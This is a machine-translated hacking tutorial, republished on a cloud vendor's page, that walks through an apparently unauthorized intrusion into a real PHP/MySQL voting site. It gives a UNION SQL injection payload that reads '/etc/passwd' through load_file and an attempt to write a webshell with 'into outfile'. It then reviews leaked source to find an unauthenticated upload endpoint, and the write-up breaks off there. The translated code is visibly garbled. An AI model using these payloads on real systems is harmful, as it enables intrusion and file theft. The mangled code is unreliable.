Learning and mining vulnerabilities from analysis code

Source: Internet
Author: User

Note:
I recently saw an article on the forum titled "all-around Daniel", with emotion. In fact, the so-called "all-around" is a solid foundation for basic knowledge. Although this article is not "omnipotent", it is not a big task. It only proves that as long as the foundation is solid, you can also "omnipotent" penetration.
This article chooses a Web site on a server of a website as an example to describe how to gradually analyze a small vulnerability to expand the scope of further penetration.
This article is for research and study only and cannot be used for illegal purposes. Otherwise, the consequences will be borne by you.
For the purpose of privacy protection, all articles and URLs are processed.

I believe many people are tired of injecting, weak passwords, and omnipotent passwords in this network. Have you ever encountered a problem where the backend cannot be found for injection, but the database is root or sa account, but webshell cannot be written, and webshell cannot be obtained in the background, but webshell cannot be obtained ?????
The example described in this article is:
A Linux server uses Apache 2.2.10 to set up a php website. The database is MySQL. The website uses a root account, but the website does not have a background or phpMyAdmin. There is an injection point in the server. Because gpc is on, webshell cannot be written, but some files with known paths on the server can be read.
This article describes how to use this injection point for next penetration.
Let's briefly describe the injection points (if you do not understand php + MySQL injection, please refer to the summary of various SQL Injection articles)
Injection point:
 
* .2cto.com/vote.php? Id = 3
 
This injection point is known based on the existing file name. It should be a voting page. Because union only has one field
 
* .2cto.com/vote.php? Id = 3 + union + select + load_file (0x2f6574632f706173737764) + from + mysql. user
 
You can read the file. According to the error ECHO, the website path is/usr/www. Because gpc is set to on
 
Union select statement hex into outfile '/usr/www/writable directory/webshell. php'
 
In this case, the webshell is not available, and the host set in MySQL. user is %. However, this server does not actually open port 3306 to the Internet, nor can it be accessed.
So what is the idea?
Let's try to read the source code of the website file to find some other vulnerabilities.
 
======================================= Start of the body ==============================
 
First, let's read the code of the injected file/usr/www/vote. php (excerpt: delete it ):
 
Require ('xajax/xajax. inc. php ');
$ Link = mysql_connect ("localhost", "root", "********") or die ('database Connection Failed: '. mysql_error ());
$ Select = mysql_select_db ("vote", $ link );
$ SID = $ _ GET ['sid '];
$ TypeId = $ _ GET ['typeid'];
/* This is the 1st function that displays the voting result */
Function shownum ($ SID, $ typeId) {// return value of the clicked button
$ SQL = "select numUp from zhendang where SID =". $ SID. "and typeId =". $ typeId ."";
$ Info = mysql_query ($ SQL );
$ It = mysql_fetch_array ($ info );
Return $ it ['0'];
}
/* This is 2nd functions. The editor has made comments and is a vote counting function */
Function updatemysql ($ SID, $ typeId) {// click the button
$ Sqladd = "update zhendang set numUp = numUp + 1 where SID =". $ SID. "and typeId =". $ typeId ."";
Mysql_query ($ sqladd );
}
 
The only thing that can be seen is the injection of the number of select fields. The possibility of exploits here is only load_file () in the injection ().
Of course, the idea cannot be limited to only one page in vote. php, because it is necessary to dig for vulnerabilities. I have read a lot of PHP files and have not found the eval () function, assert () or exec () function that can cause security problems.
However, one file caught my attention. There was an information. php file, which showed me where the code of the file caught my attention (excerpt code, with deletions)
 
If ($ upload_pic! = ""){
/* The # annotations below are all added by the author, with debugging code and function comments */
$ Allowed_types = array ('jpg ', 'gif', 'png ');
# Regular expressions match the extension of the uploaded file
Preg_match ('| \. (\ w +) $ |', $ com_pic, $ ext );
# Print_r ($ ext );
# Convert to lowercase
$ Ext = strtolower ($ ext [1]);
# Determine whether the extension is allowed
If (! In_array ($ ext, $ allowed_types )){
$ ObjResponse-> addAlert ('disallowed file type ');
Return $ objResponse; www.2cto.com
}
}
 
Here is a function used to check the suffix of the uploaded file. Since the check function is available, it is possible that the upload function will be available. Although there is a suffix check, it is better to look at it.
The upload function in the information. php file is not found after it is opened in a browser. It is estimated that it can be used only after registration.
Then let's look at its source code:
 
 
 
 
It seems that the uploaded file is passed to form. php, while information. php only processes the suffix check of the uploaded file. Then let's look at the form. php code (excerpt, which can be deleted and modified ):
Include ("inc. php ");
$ User = $ _ POST ['user'];
$ Area = $ _ POST ['region'];
$ Type = $ _ POST ['type'];
$ Title = $ _ POST ['title'];
$ Context = $ _ POST ['context'];
$ Pic = $ HTTP_POST_FILES ['pic '];
// Echo $ pic [size];
If ($ title = "") {echo "alert ('warning! ') "; Exit ;}
If ($ context = "") {echo "alert ('warning! ') "; Exit ;}
If (! $ Pic ['name'] = ""){
//...
Else {
$ SQL = "insert into plaint (user, area, type, title, content, time) values ('". $ user. "','". $ area. "','". $ type. "','". $ title. "','". $ context. "','". date ("Y-m-d H: I: s "). "')";
$ Link = mysql_connect ("localhost", "root", "********") or die ("database exception ");
$ Select = mysql_select_db ("datab", $ link );
@ Mysql_query ($ SQL );
@ Mysql_close ();
//...
 
After a rough look, there is no session check in inc. php. That is to say, anyone can POST data to form. php.
Then, we construct a local POST html file based on the page code.
For details about how to construct the POST data of a local html file, refer to this article: POST form and upload breakthrough JS suffix check analysis

Author YoCo Smart from: Silic Group Hacker Army [BlackBap. Org]

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.